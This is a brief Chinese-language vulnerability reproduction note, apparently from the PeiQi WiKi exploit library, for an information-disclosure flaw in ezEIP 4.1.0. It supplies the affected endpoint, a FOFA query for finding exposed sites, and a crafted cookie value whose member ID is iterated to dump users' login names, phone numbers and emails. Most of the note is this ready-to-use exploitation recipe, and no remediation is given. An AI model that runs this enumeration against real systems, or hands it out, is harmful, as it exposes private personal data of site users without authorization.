ezEIP 4.1.0 信息泄露漏洞

漏洞描述

ezEIP 4.1.0 存在信息泄露漏洞,通过遍历Cookie中的参数值获取敏感信息

漏洞影响

[!NOTE]

ezEIP 4.1.0

FOFA

[!NOTE]

"ezEIP"

漏洞复现

漏洞Url为

/label/member/getinfo.aspx

访问时添加Cookie(通过遍历获取用户的登录名电话邮箱等信息)

WHIR_USERINFOR=whir_mem_member_pid=1;

ez-1

PeiQi WiKi文库 all right reserved,powered by Gitbook文件更新时间: 2021-05-20 23:44:40

results matching ""

    No results matching ""